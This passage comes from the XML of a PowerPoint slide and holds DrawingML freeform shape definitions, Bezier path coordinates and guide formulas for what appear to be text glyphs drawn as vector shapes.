                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17ACB9DD-ADD9-469B-A19C-8508FB334C19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4205287" y="1792288"/>
              <a:ext cx="80963" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 212 w 212"/>
                <a:gd name="T1" fmla="*/ 286 h 310"/>
                <a:gd name="T2" fmla="*/ 212 w 212"/>
                <a:gd name="T3" fmla="*/ 274 h 310"/>
                <a:gd name="T4" fmla="*/ 192 w 212"/>
                <a:gd name="T5" fmla="*/ 250 h 310"/>
                <a:gd name="T6" fmla="*/ 171 w 212"/>
                <a:gd name="T7" fmla="*/ 273 h 310"/>
                <a:gd name="T8" fmla="*/ 70 w 212"/>
                <a:gd name="T9" fmla="*/ 273 h 310"/>
                <a:gd name="T10" fmla="*/ 158 w 212"/>
                <a:gd name="T11" fmla="*/ 199 h 310"/>
                <a:gd name="T12" fmla="*/ 212 w 212"/>
                <a:gd name="T13" fmla="*/ 99 h 310"/>
                <a:gd name="T14" fmla="*/ 100 w 212"/>
                <a:gd name="T15" fmla="*/ 0 h 310"/>
                <a:gd name="T16" fmla="*/ 0 w 212"/>
                <a:gd name="T17" fmla="*/ 85 h 310"/>
                <a:gd name="T18" fmla="*/ 26 w 212"/>
                <a:gd name="T19" fmla="*/ 112 h 310"/>
                <a:gd name="T20" fmla="*/ 51 w 212"/>
                <a:gd name="T21" fmla="*/ 87 h 310"/>
                <a:gd name="T22" fmla="*/ 45 w 212"/>
                <a:gd name="T23" fmla="*/ 70 h 310"/>
                <a:gd name="T24" fmla="*/ 97 w 212"/>
                <a:gd name="T25" fmla="*/ 38 h 310"/>
                <a:gd name="T26" fmla="*/ 171 w 212"/>
                <a:gd name="T27" fmla="*/ 99 h 310"/>
                <a:gd name="T28" fmla="*/ 116 w 212"/>
                <a:gd name="T29" fmla="*/ 185 h 310"/>
                <a:gd name="T30" fmla="*/ 9 w 212"/>
                <a:gd name="T31" fmla="*/ 275 h 310"/>
                <a:gd name="T32" fmla="*/ 0 w 212"/>
                <a:gd name="T33" fmla="*/ 291 h 310"/>
                <a:gd name="T34" fmla="*/ 24 w 212"/>
                <a:gd name="T35" fmla="*/ 310 h 310"/>
                <a:gd name="T36" fmla="*/ 189 w 212"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 212 w 212"/>
                <a:gd name="T39" fmla="*/ 28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" h="310">
                  <a:moveTo>
                    <a:pt x="212" y="286"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="212" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="262"/>
                    <a:pt x="212" y="250"/>
                    <a:pt x="192" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="250"/>
                    <a:pt x="171" y="259"/>
                    <a:pt x="171" y="273"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="273"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="139" y="217"/>
                    <a:pt x="158" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="171"/>
                    <a:pt x="212" y="139"/>
                    <a:pt x="212" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="39"/>
                    <a:pt x="161" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="0"/>
                    <a:pt x="0" y="42"/>
                    <a:pt x="0" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="106"/>
                    <a:pt x="16" y="112"/>
                    <a:pt x="26" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="112"/>
                    <a:pt x="51" y="103"/>
                    <a:pt x="51" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="81"/>
                    <a:pt x="49" y="74"/>
                    <a:pt x="45" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="51"/>
                    <a:pt x="73" y="38"/>
                    <a:pt x="97" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="38"/>
                    <a:pt x="171" y="59"/>
                    <a:pt x="171" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="132"/>
                    <a:pt x="148" y="159"/>
                    <a:pt x="116" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="280"/>
                    <a:pt x="0" y="283"/>
                    <a:pt x="0" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="310"/>
                    <a:pt x="14" y="310"/>
                    <a:pt x="24" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="189" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="310"/>
                    <a:pt x="212" y="305"/>
                    <a:pt x="212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6" name="Freeform 1227">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8134466-22C8-4A08-A09A-7DA479839C09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4308475" y="1827213"/>
              <a:ext cx="76200" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 199"/>
                <a:gd name="T1" fmla="*/ 165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5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="148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1" y="155"/>
                    <a:pt x="41" y="113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7" name="Freeform 1228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E6AB55-6A02-4675-ABC8-70FEBC17774E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4806950" y="1812925"/>
              <a:ext cx="169863" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 443 w 443"/>
                <a:gd name="T1" fmla="*/ 130 h 260"/>
                <a:gd name="T2" fmla="*/ 432 w 443"/>
                <a:gd name="T3" fmla="*/ 120 h 260"/>
                <a:gd name="T4" fmla="*/ 55 w 443"/>
                <a:gd name="T5" fmla="*/ 120 h 260"/>
                <a:gd name="T6" fmla="*/ 126 w 443"/>
                <a:gd name="T7" fmla="*/ 6 h 260"/>
                <a:gd name="T8" fmla="*/ 121 w 443"/>
                <a:gd name="T9" fmla="*/ 0 h 260"/>
                <a:gd name="T10" fmla="*/ 112 w 443"/>
                <a:gd name="T11" fmla="*/ 0 h 260"/>
                <a:gd name="T12" fmla="*/ 106 w 443"/>
                <a:gd name="T13" fmla="*/ 4 h 260"/>
                <a:gd name="T14" fmla="*/ 4 w 443"/>
                <a:gd name="T15" fmla="*/ 125 h 260"/>
                <a:gd name="T16" fmla="*/ 0 w 443"/>
                <a:gd name="T17" fmla="*/ 130 h 260"/>
                <a:gd name="T18" fmla="*/ 4 w 443"/>
                <a:gd name="T19" fmla="*/ 135 h 260"/>
                <a:gd name="T20" fmla="*/ 106 w 443"/>
                <a:gd name="T21" fmla="*/ 255 h 260"/>
                <a:gd name="T22" fmla="*/ 112 w 443"/>
                <a:gd name="T23" fmla="*/ 260 h 260"/>
                <a:gd name="T24" fmla="*/ 121 w 443"/>
                <a:gd name="T25" fmla="*/ 260 h 260"/>
                <a:gd name="T26" fmla="*/ 126 w 443"/>
                <a:gd name="T27" fmla="*/ 253 h 260"/>
                <a:gd name="T28" fmla="*/ 55 w 443"/>
                <a:gd name="T29" fmla="*/ 140 h 260"/>
                <a:gd name="T30" fmla="*/ 432 w 443"/>
                <a:gd name="T31" fmla="*/ 140 h 260"/>
                <a:gd name="T32" fmla="*/ 443 w 443"/>
                <a:gd name="T33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0">
                  <a:moveTo>
                    <a:pt x="443" y="130"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="443" y="125"/>
                    <a:pt x="439" y="120"/>
                    <a:pt x="432" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="55" y="120"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="93"/>
                    <a:pt x="118" y="52"/>
                    <a:pt x="126" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="2"/>
                    <a:pt x="124" y="0"/>
                    <a:pt x="121" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="0"/>
                    <a:pt x="107" y="2"/>
                    <a:pt x="106" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="60"/>
                    <a:pt x="58" y="106"/>
                    <a:pt x="4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2"/>
                    <a:pt x="2" y="134"/>
                    <a:pt x="4" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="154"/>
                    <a:pt x="97" y="199"/>
                    <a:pt x="106" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="258"/>
                    <a:pt x="109" y="260"/>
                    <a:pt x="112" y="260"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="121" y="260"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="260"/>
                    <a:pt x="126" y="257"/>
                    <a:pt x="126" y="253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="207"/>
                    <a:pt x="92" y="167"/>
                    <a:pt x="55" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="432" y="140"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="439" y="140"/>
                    <a:pt x="443" y="135"/>
                    <a:pt x="443" y="1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8" name="Freeform 1229">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F412857B-CA1E-46F8-B154-A54B0C29F74C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4970462" y="1860550"/>
              <a:ext cx="117475" cy="7938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 305 w 305"/>
                <a:gd name="T1" fmla="*/ 10 h 20"/>
                <a:gd name="T2" fmla="*/ 288 w 305"/>
                <a:gd name="T3" fmla="*/ 0 h 20"/>
                <a:gd name="T4" fmla="*/ 17 w 305"/>
                <a:gd name="T5" fmla="*/ 0 h 20"/>
                <a:gd name="T6" fmla="*/ 0 w 305"/>
                <a:gd name="T7" fmla="*/ 10 h 20"/>
                <a:gd name="T8" fmla="*/ 17 w 305"/>
                <a:gd name="T9" fmla="*/ 20 h 20"/>
                <a:gd name="T10" fmla="*/ 288 w 305"/>
                <a:gd name="T11" fmla="*/ 20 h 20"/>
                <a:gd name="T12" fmla="*/ 305 w 305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305" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="0"/>
                    <a:pt x="295" y="0"/>
                    <a:pt x="288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288" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="295" y="20"/>
                    <a:pt x="305" y="20"/>
                    <a:pt x="305" y="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9" name="Freeform 1230">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E650940F-BAEA-4762-A3B3-0D48EB04EF0D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5208587" y="1793875"/>
              <a:ext cx="90488" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 237 w 237"/>
                <a:gd name="T1" fmla="*/ 59 h 304"/>
                <a:gd name="T2" fmla="*/ 237 w 237"/>
                <a:gd name="T3" fmla="*/ 24 h 304"/>
                <a:gd name="T4" fmla="*/ 214 w 237"/>
                <a:gd name="T5" fmla="*/ 0 h 304"/>
                <a:gd name="T6" fmla="*/ 24 w 237"/>
                <a:gd name="T7" fmla="*/ 0 h 304"/>
                <a:gd name="T8" fmla="*/ 0 w 237"/>
                <a:gd name="T9" fmla="*/ 24 h 304"/>
                <a:gd name="T10" fmla="*/ 0 w 237"/>
                <a:gd name="T11" fmla="*/ 59 h 304"/>
                <a:gd name="T12" fmla="*/ 20 w 237"/>
                <a:gd name="T13" fmla="*/ 83 h 304"/>
                <a:gd name="T14" fmla="*/ 41 w 237"/>
                <a:gd name="T15" fmla="*/ 59 h 304"/>
                <a:gd name="T16" fmla="*/ 41 w 237"/>
                <a:gd name="T17" fmla="*/ 37 h 304"/>
                <a:gd name="T18" fmla="*/ 98 w 237"/>
                <a:gd name="T19" fmla="*/ 37 h 304"/>
                <a:gd name="T20" fmla="*/ 98 w 237"/>
                <a:gd name="T21" fmla="*/ 267 h 304"/>
                <a:gd name="T22" fmla="*/ 77 w 237"/>
                <a:gd name="T23" fmla="*/ 267 h 304"/>
                <a:gd name="T24" fmla="*/ 53 w 237"/>
                <a:gd name="T25" fmla="*/ 285 h 304"/>
                <a:gd name="T26" fmla="*/ 77 w 237"/>
                <a:gd name="T27" fmla="*/ 304 h 304"/>
                <a:gd name="T28" fmla="*/ 161 w 237"/>
                <a:gd name="T29" fmla="*/ 304 h 304"/>
                <a:gd name="T30" fmla="*/ 184 w 237"/>
                <a:gd name="T31" fmla="*/ 286 h 304"/>
                <a:gd name="T32" fmla="*/ 161 w 237"/>
                <a:gd name="T33" fmla="*/ 267 h 304"/>
                <a:gd name="T34" fmla="*/ 139 w 237"/>
                <a:gd name="T35" fmla="*/ 267 h 304"/>
                <a:gd name="T36" fmla="*/ 139 w 237"/>
                <a:gd name="T37" fmla="*/ 37 h 304"/>
                <a:gd name="T38" fmla="*/ 196 w 237"/>
                <a:gd name="T39" fmla="*/ 37 h 304"/>
                <a:gd name="T40" fmla="*/ 196 w 237"/>
                <a:gd name="T41" fmla="*/ 59 h 304"/>
                <a:gd name="T42" fmla="*/ 216 w 237"/>
                <a:gd name="T43" fmla="*/ 83 h 304"/>
                <a:gd name="T44" fmla="*/ 237 w 237"/>
                <a:gd name="T45" fmla="*/ 5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4">
                  <a:moveTo>
                    <a:pt x="237" y="59"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="237" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="6"/>
                    <a:pt x="234" y="0"/>
                    <a:pt x="214" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="0"/>
                    <a:pt x="0" y="4"/>
                    <a:pt x="0" y="24"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="59"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70"/>
                    <a:pt x="0" y="83"/>
                    <a:pt x="20" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="83"/>
                    <a:pt x="41" y="70"/>
                    <a:pt x="41" y="59"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="41" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="267"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="267"/>
                    <a:pt x="53" y="267"/>
                    <a:pt x="53" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="304"/>
                    <a:pt x="67" y="304"/>
                    <a:pt x="77" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="161" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="304"/>
                    <a:pt x="184" y="304"/>
                    <a:pt x="184" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="267"/>
                    <a:pt x="170" y="267"/>
                    <a:pt x="161" y="267"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="59"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="70"/>
                    <a:pt x="196" y="83"/>
                    <a:pt x="216" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="83"/>
                    <a:pt x="237" y="70"/>
                    <a:pt x="237" y="5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0" name="Freeform 1231">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBEA984E-87C8-4406-9521-06F8450F9C61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5305425" y="1793875"/>
              <a:ext cx="96838" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 250 w 250"/>
                <a:gd name="T1" fmla="*/ 286 h 304"/>
                <a:gd name="T2" fmla="*/ 227 w 250"/>
                <a:gd name="T3" fmla="*/ 267 h 304"/>
                <a:gd name="T4" fmla="*/ 209 w 250"/>
                <a:gd name="T5" fmla="*/ 267 h 304"/>
                <a:gd name="T6" fmla="*/ 209 w 250"/>
                <a:gd name="T7" fmla="*/ 158 h 304"/>
                <a:gd name="T8" fmla="*/ 142 w 250"/>
                <a:gd name="T9" fmla="*/ 84 h 304"/>
                <a:gd name="T10" fmla="*/ 82 w 250"/>
                <a:gd name="T11" fmla="*/ 105 h 304"/>
                <a:gd name="T12" fmla="*/ 82 w 250"/>
                <a:gd name="T13" fmla="*/ 24 h 304"/>
                <a:gd name="T14" fmla="*/ 59 w 250"/>
                <a:gd name="T15" fmla="*/ 0 h 304"/>
                <a:gd name="T16" fmla="*/ 23 w 250"/>
                <a:gd name="T17" fmla="*/ 0 h 304"/>
                <a:gd name="T18" fmla="*/ 0 w 250"/>
                <a:gd name="T19" fmla="*/ 19 h 304"/>
                <a:gd name="T20" fmla="*/ 23 w 250"/>
                <a:gd name="T21" fmla="*/ 37 h 304"/>
                <a:gd name="T22" fmla="*/ 41 w 250"/>
                <a:gd name="T23" fmla="*/ 37 h 304"/>
                <a:gd name="T24" fmla="*/ 41 w 250"/>
                <a:gd name="T25" fmla="*/ 267 h 304"/>
                <a:gd name="T26" fmla="*/ 23 w 250"/>
                <a:gd name="T27" fmla="*/ 267 h 304"/>
                <a:gd name="T28" fmla="*/ 0 w 250"/>
                <a:gd name="T29" fmla="*/ 286 h 304"/>
                <a:gd name="T30" fmla="*/ 23 w 250"/>
                <a:gd name="T31" fmla="*/ 304 h 304"/>
                <a:gd name="T32" fmla="*/ 100 w 250"/>
                <a:gd name="T33" fmla="*/ 304 h 304"/>
                <a:gd name="T34" fmla="*/ 123 w 250"/>
                <a:gd name="T35" fmla="*/ 286 h 304"/>
                <a:gd name="T36" fmla="*/ 100 w 250"/>
                <a:gd name="T37" fmla="*/ 267 h 304"/>
                <a:gd name="T38" fmla="*/ 82 w 250"/>
                <a:gd name="T39" fmla="*/ 267 h 304"/>
                <a:gd name="T40" fmla="*/ 82 w 250"/>
                <a:gd name="T41" fmla="*/ 185 h 304"/>
                <a:gd name="T42" fmla="*/ 139 w 250"/>
                <a:gd name="T43" fmla="*/ 122 h 304"/>
                <a:gd name="T44" fmla="*/ 168 w 250"/>
                <a:gd name="T45" fmla="*/ 161 h 304"/>
                <a:gd name="T46" fmla="*/ 168 w 250"/>
                <a:gd name="T47" fmla="*/ 267 h 304"/>
                <a:gd name="T48" fmla="*/ 153 w 250"/>
                <a:gd name="T49" fmla="*/ 267 h 304"/>
                <a:gd name="T50" fmla="*/ 129 w 250"/>
                <a:gd name="T51" fmla="*/ 286 h 304"/>
                <a:gd name="T52" fmla="*/ 153 w 250"/>
                <a:gd name="T53" fmla="*/ 304 h 304"/>
                <a:gd name="T54" fmla="*/ 227 w 250"/>
                <a:gd name="T55" fmla="*/ 304 h 304"/>
                <a:gd name="T56" fmla="*/ 250 w 250"/>
                <a:gd name="T5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4">
                  <a:moveTo>
                    <a:pt x="250" y="286"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="267"/>
                    <a:pt x="236" y="267"/>
                    <a:pt x="227" y="267"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="209" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="106"/>
                    <a:pt x="183" y="84"/>
                    <a:pt x="142" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="84"/>
                    <a:pt x="94" y="96"/>
                    <a:pt x="82" y="105"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="82" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="6"/>
                    <a:pt x="79" y="0"/>
                    <a:pt x="59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1" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="267"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="267"/>
                    <a:pt x="0" y="267"/>
                    <a:pt x="0" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="15" y="304"/>
                    <a:pt x="23" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="304"/>
                    <a:pt x="123" y="304"/>
                    <a:pt x="123" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="267"/>
                    <a:pt x="109" y="267"/>
                    <a:pt x="100" y="267"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="82" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="185"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="139"/>
                    <a:pt x="116" y="122"/>
                    <a:pt x="139" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="122"/>
                    <a:pt x="168" y="134"/>
                    <a:pt x="168" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="267"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="267"/>
                    <a:pt x="129" y="267"/>
                    <a:pt x="129" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="304"/>
                    <a:pt x="144" y="304"/>
                    <a:pt x="153" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="227" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="304"/>
                    <a:pt x="250" y="304"/>
                    <a:pt x="250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1" name="Freeform 1232">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92F8871-1993-4DAF-8CA8-A95D04BCE972}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId227"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5418137" y="1795463"/>
              <a:ext cx="73025" cy="117475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0 w 191"/>
                <a:gd name="T5" fmla="*/ 265 h 302"/>
                <a:gd name="T6" fmla="*/ 120 w 191"/>
                <a:gd name="T7" fmla="*/ 109 h 302"/>
                <a:gd name="T8" fmla="*/ 97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2 w 191"/>
                <a:gd name="T31" fmla="*/ 28 h 302"/>
                <a:gd name="T32" fmla="*/ 94 w 191"/>
                <a:gd name="T33" fmla="*/ 0 h 302"/>
                <a:gd name="T34" fmla="*/ 66 w 191"/>
                <a:gd name="T35" fmla="*/ 28 h 302"/>
                <a:gd name="T36" fmla="*/ 94 w 191"/>
                <a:gd name="T37" fmla="*/ 57 h 302"/>
                <a:gd name="T38" fmla="*/ 122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5"/>
                    <a:pt x="176" y="265"/>
                    <a:pt x="167" y="265"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="120" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="91"/>
                    <a:pt x="117" y="85"/>
                    <a:pt x="97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5" y="265"/>
                    <a:pt x="0" y="265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2" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="13"/>
                    <a:pt x="110" y="0"/>
                    <a:pt x="94" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="0"/>
                    <a:pt x="66" y="13"/>
                    <a:pt x="66" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="44"/>
                    <a:pt x="78" y="57"/>
                    <a:pt x="94" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="57"/>
                    <a:pt x="122" y="44"/>
                    <a:pt x="122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2" name="Freeform 1233">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B77359-9FF2-4DA5-B583-A3D8622B5D6B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5516562" y="1827213"/>
              <a:ext cx="76200" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 157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7 h 224"/>
                <a:gd name="T30" fmla="*/ 100 w 196"/>
                <a:gd name="T31" fmla="*/ 187 h 224"/>
                <a:gd name="T32" fmla="*/ 42 w 196"/>
                <a:gd name="T33" fmla="*/ 147 h 224"/>
                <a:gd name="T34" fmla="*/ 21 w 196"/>
                <a:gd name="T35" fmla="*/ 130 h 224"/>
                <a:gd name="T36" fmla="*/ 0 w 196"/>
                <a:gd name="T37" fmla="*/ 154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7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7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7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="136"/>
                    <a:pt x="36" y="130"/>
                    <a:pt x="21" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="130"/>
                    <a:pt x="0" y="142"/>
                    <a:pt x="0" y="154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3" name="Freeform 1234">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E53D8D4-6BE5-4A1C-9502-E2C5D8ED6F99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5708650" y="1827213"/>
              <a:ext cx="92075" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 240 w 240"/>
                <a:gd name="T1" fmla="*/ 19 h 219"/>
                <a:gd name="T2" fmla="*/ 216 w 240"/>
                <a:gd name="T3" fmla="*/ 0 h 219"/>
                <a:gd name="T4" fmla="*/ 159 w 240"/>
                <a:gd name="T5" fmla="*/ 0 h 219"/>
                <a:gd name="T6" fmla="*/ 136 w 240"/>
                <a:gd name="T7" fmla="*/ 18 h 219"/>
                <a:gd name="T8" fmla="*/ 159 w 240"/>
                <a:gd name="T9" fmla="*/ 37 h 219"/>
                <a:gd name="T10" fmla="*/ 167 w 240"/>
                <a:gd name="T11" fmla="*/ 37 h 219"/>
                <a:gd name="T12" fmla="*/ 120 w 240"/>
                <a:gd name="T13" fmla="*/ 178 h 219"/>
                <a:gd name="T14" fmla="*/ 73 w 240"/>
                <a:gd name="T15" fmla="*/ 37 h 219"/>
                <a:gd name="T16" fmla="*/ 81 w 240"/>
                <a:gd name="T17" fmla="*/ 37 h 219"/>
                <a:gd name="T18" fmla="*/ 104 w 240"/>
                <a:gd name="T19" fmla="*/ 19 h 219"/>
                <a:gd name="T20" fmla="*/ 81 w 240"/>
                <a:gd name="T21" fmla="*/ 0 h 219"/>
                <a:gd name="T22" fmla="*/ 24 w 240"/>
                <a:gd name="T23" fmla="*/ 0 h 219"/>
                <a:gd name="T24" fmla="*/ 0 w 240"/>
                <a:gd name="T25" fmla="*/ 19 h 219"/>
                <a:gd name="T26" fmla="*/ 24 w 240"/>
                <a:gd name="T27" fmla="*/ 37 h 219"/>
                <a:gd name="T28" fmla="*/ 36 w 240"/>
